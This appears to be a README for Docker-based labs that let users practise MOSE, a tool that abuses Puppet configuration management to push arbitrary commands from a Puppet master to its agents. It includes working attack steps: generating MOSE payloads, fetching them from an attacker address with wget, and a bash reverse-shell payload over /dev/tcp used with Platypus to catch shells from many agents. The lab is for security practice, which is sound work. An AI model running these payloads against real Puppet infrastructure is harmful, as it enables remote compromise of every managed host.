Create test labs which can be used to play around with MOSE and Puppet.
Warning, take heed: This lab should be run in a controlled environment, as it contains vulnerable assets.
You must download and install the following for this environment to work:
To create an environment with a Puppet Master that controls a single agent with a simple hello world module, run the following command:
cd basic && make run
To run MOSE against it:
- Build MOSE using
make build
in the MOSE repo - Generate a payload with MOSE:
./mose -c "touch /tmp/BLA && echo test >> /tmp/BLA" -t puppet
- Get it to the puppet master:
docker exec -it basic-puppetmaster wget http://YOURIPADDRESSGOESHERE:8080/puppet-linux
- Exec into the puppet master:
docker exec -it basic-puppetmaster bash
- Run the payload:
chmod +x puppet-linux; ./puppet-linux
- Wait for 30 minutes or exec into one of the agents and kick off the payload manually:
docker exec -it basic-puppetagent bash
and then runpuppet agent -t
- For this example, you should note that a file has been created in
/tmp
in the basic-puppetagent container, as we specified in step 2.
To tear down the basic lab, run the following command:
make destroy
To create an environment with a Puppet Master that controls n number of agents, start by specifying the number of agents to create:
- Open mass_puppet.py
- Change
number_agents
to your desired number of agents. The counter starts at 2, so 21 agents actually yields 19.
Next, run the following command to stand up the environment:
cd mass_agents && make run
To run MOSE against the lab and get a ton of shells, do the following:
- Build MOSE using
make build
in the MOSE repo - Download Platypus from here: https://github.com/WangYihang/Platypus/releases/tag/v1.1.0
- Run Platypus using the instructions provided in the repo's README
- Generate a payload with MOSE:
./mose -c "bash -i >& /dev/tcp/YOURIPADDRESSGOESHERE/8080 0>&1 &" -t puppet
- Get it to the puppet master: `docker exec -it massagents-puppetmaster wget http://YOURIPADDRESSGOESHERE:8080/puppet-linux
- Exec into the puppet master:
docker exec -it massagents-puppetmaster bash
- Run the payload:
chmod +x puppet-linux; ./puppet-linux
Back on the attackers system, kick off the agents by running:
bash pwn.sh
To tear down the mass agent lab, run the following command:
make destroy
To create an environment with a Puppet Master that controls a prod and dev environment that include a web application, a mysql database, and various package installs, run the following command:
cd extended && make run
To run MOSE against it:
- Build MOSE using
make build
in the MOSE repo - Generate a payload with MOSE:
./mose -c "touch /tmp/BLA && echo test >> /tmp/BLA" -t puppet
- Get it to the puppet master:
docker exec -it extended-puppetmaster wget http://YOURIPADDRESSGOESHERE:8090/puppet-linux
- Exec into the puppet master:
docker exec -it extended-puppetmaster bash
- Run the payload:
chmod +x puppet-linux; ./puppet-linux
- Wait for 30 minutes or exec into one of the agents and kick off the payload manually:
docker exec -it prodlaptop bash
and then runpuppet agent -t
- For this example, you should note that a file has been created in
/tmp
in the prodlaptop container, as we specified in step 2.
You can also target development systems by running puppet agent -t --environment development
on the appropriate systems.
This environment can be used for more interesting attack chains, such as targeted payloads specifically for the webservers, leveraging secrets to access a database, etc.
To tear down the extended lab, run the following command:
make destroy